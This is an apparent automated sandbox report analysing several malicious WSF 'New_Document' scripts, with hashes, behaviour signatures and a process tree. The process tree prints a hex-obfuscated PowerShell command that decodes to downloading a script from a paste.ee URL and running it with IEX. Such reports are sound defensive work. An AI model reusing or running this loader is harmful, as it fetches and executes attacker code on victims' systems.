Overview
overview
10Static
static
1New_Docume...65.wsf
windows7-x64
8New_Docume...65.wsf
windows10-2004-x64
10New_Docume...42.wsf
windows7-x64
8New_Docume...42.wsf
windows10-2004-x64
10New_Docume...07.wsf
windows7-x64
8New_Docume...07.wsf
windows10-2004-x64
10New_Docume...06.wsf
windows7-x64
8New_Docume...06.wsf
windows10-2004-x64
10New_Docume...75.wsf
windows7-x64
8New_Docume...75.wsf
windows10-2004-x64
10New_Docume...59.wsf
windows7-x64
8New_Docume...59.wsf
windows10-2004-x64
10New_Docume...66.wsf
windows7-x64
8New_Docume...66.wsf
windows10-2004-x64
10New_Docume...60.wsf
windows7-x64
8New_Docume...60.wsf
windows10-2004-x64
10New_Docume...76.wsf
windows7-x64
8New_Docume...76.wsf
windows10-2004-x64
10New_Docume...20.wsf
windows7-x64
8New_Docume...20.wsf
windows10-2004-x64
10New_Docume...52.wsf
windows7-x64
8New_Docume...52.wsf
windows10-2004-x64
10New_Docume...83.wsf
windows7-x64
8New_Docume...83.wsf
windows10-2004-x64
10New_Docume...75.wsf
windows7-x64
8New_Docume...75.wsf
windows10-2004-x64
10New_Docume...54.wsf
windows7-x64
8New_Docume...54.wsf
windows10-2004-x64
10New_Docume...07.wsf
windows7-x64
8New_Docume...07.wsf
windows10-2004-x64
10New_Docume...75.wsf
windows7-x64
8New_Docume...75.wsf
windows10-2004-x64
10Analysis
-
max time kernel
122s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25/09/2024, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
New_Document-660100069565.wsf
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
New_Document-660100069565.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
New_Document-660100089442.wsf
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
New_Document-660100089442.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
New_Document-660100324207.wsf
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
New_Document-660100324207.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
New_Document-660100401006.wsf
Resource
win7-20240729-en
Behavioral task
behavioral8
Sample
New_Document-660100401006.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
New_Document-660101335975.wsf
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
New_Document-660101335975.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
New_Document-660103261859.wsf
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
New_Document-660103261859.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral13
Sample
New_Document-660103451766.wsf
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
New_Document-660103451766.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral15
Sample
New_Document-660103764860.wsf
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
New_Document-660103764860.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral17
Sample
New_Document-660103782076.wsf
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
New_Document-660103782076.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral19
Sample
New_Document-660104074420.wsf
Resource
win7-20240708-en
Behavioral task
behavioral20
Sample
New_Document-660104074420.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral21
Sample
New_Document-660104278752.wsf
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
New_Document-660104278752.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral23
Sample
New_Document-660104465083.wsf
Resource
win7-20240903-en
Behavioral task
behavioral24
Sample
New_Document-660104465083.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral25
Sample
New_Document-660104663275.wsf
Resource
win7-20240708-en
Behavioral task
behavioral26
Sample
New_Document-660104663275.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral27
Sample
New_Document-660104744454.wsf
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
New_Document-660104744454.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral29
Sample
New_Document-660105100807.wsf
Resource
win7-20240729-en
Behavioral task
behavioral30
Sample
New_Document-660105100807.wsf
Resource
win10v2004-20240802-en
Behavioral task
behavioral31
Sample
New_Document-660105449375.wsf
Resource
win7-20240903-en
General
-
Target
New_Document-660103764860.wsf
-
Size
5KB
-
MD5
6cf21f8e5a003e06d32715305b173201
-
SHA1
06f47d69ed314b69adcfd337478d23493a399b45
-
SHA256
78fa2e585c744aea0995fffd1e0916baebf76d383235f90b0415df4301f0dd10
-
SHA512
f1dd798f700a065e82907eb6fd3231a109ef152e3655e5371e427c32a6b8c18957dd7bc0df56ef19f613ab7a969104b4c447b9f2060e1855c698474c5bccb6dc
-
SSDEEP
96:Tos4XrHTYi6l03P/hyUMl2N6SMxV3xzjpevg50yGFgV9xVf:cs+r/0I3HM06SwfzjpevgeyGFmnd
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 1044 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1044 powershell.exe 2192 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1044 powershell.exe Token: SeDebugPrivilege 2192 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2992 wrote to memory of 1044 2992 WScript.exe 30 PID 2992 wrote to memory of 1044 2992 WScript.exe 30 PID 2992 wrote to memory of 1044 2992 WScript.exe 30 PID 1044 wrote to memory of 2192 1044 powershell.exe 32 PID 1044 wrote to memory of 2192 1044 powershell.exe 32 PID 1044 wrote to memory of 2192 1044 powershell.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\New_Document-660103764860.wsf"1⤵
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = [STRINg]::jOIn('' , ( ( 24,52 ,'3d', 27, 49 , 65, 58 ,28, '4e' ,65 ,27,'3b', 24 , 52,45 , 20, '3d' ,20, 24 ,52,'2b' ,27 ,57, '2d' ,'4f' , 42 ,'4a',27 ,'3b',24 , 52, 45 ,44 ,20 ,'3d' ,20,24 ,52, 45,'2b',27 ,65,43, 54 , 20 , '4e' , 65 ,54 ,'2e' , 57,27,'3b',24, 50,41,43 , '3d' ,27 , 65 , 42 , 43 , '4c',27,'3b' , 24 , 78 ,78 ,20,'3d',20 ,24,50 ,41 ,43,'2b' , 27 ,49 , 65, '4e' , 27 , '3b',24, 52, '4f' , 20,'3d' , 20 ,24, 78, 78 ,'2b' ,27,54 , 29 ,'2e', 44, '4f' , 57, '4e','4c','4f',27, '3b' ,24,'7a', '7a', '3d' ,27 ,'4f' ,40,30, 28 , 26, 28 ,27 , 27,68 , 74 ,74 ,70 ,73, '3a','2f' , '2f',70,61,73,74 ,65, '2e' ,65 ,65,'2f',72, '2f',79, 45, 55 , '4d',51,'2f' , 30,27,27 ,29 ,27 , '2e', 52,65,50 , '4c' ,41 , 43, 65, 28 ,27,'4f', 40 , 30, 28, 26 , 27,'2c' ,27 , 41, 44,53 , 54 ,52, 49 ,'4e' ,47,27,29 ,'3b' , 69,65,78,28, 24 ,52 ,45 , 44, '2b' , 24 ,52 , '4f','2b', 24,'7a' ,'7a',29 ) |foREAcH-Object{( [CONVeRT]::ToiNt16(([sTrING]$_ ),16) -AS[CHaR])})) |& ( $ShEllid[1]+$SheLLID[13]+'x') ; powershell $ReDrO"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD519a2aa637845ab7800c5c0c7d502c0d9
SHA10c88f71c41d9233b6a37de7acce2cfb2d40d05dc
SHA256df8ae3ea035b74a44661dcfcf1c9fe9118b1eba2d93c59cbee059db046b20b79
SHA512dfc030161742d845a49c664c08200038bc87f7d0702707921d24973ba574546489f9b85afed1208a51573f29874ae69034462fe81462cb4a3a1ffff1377dcf02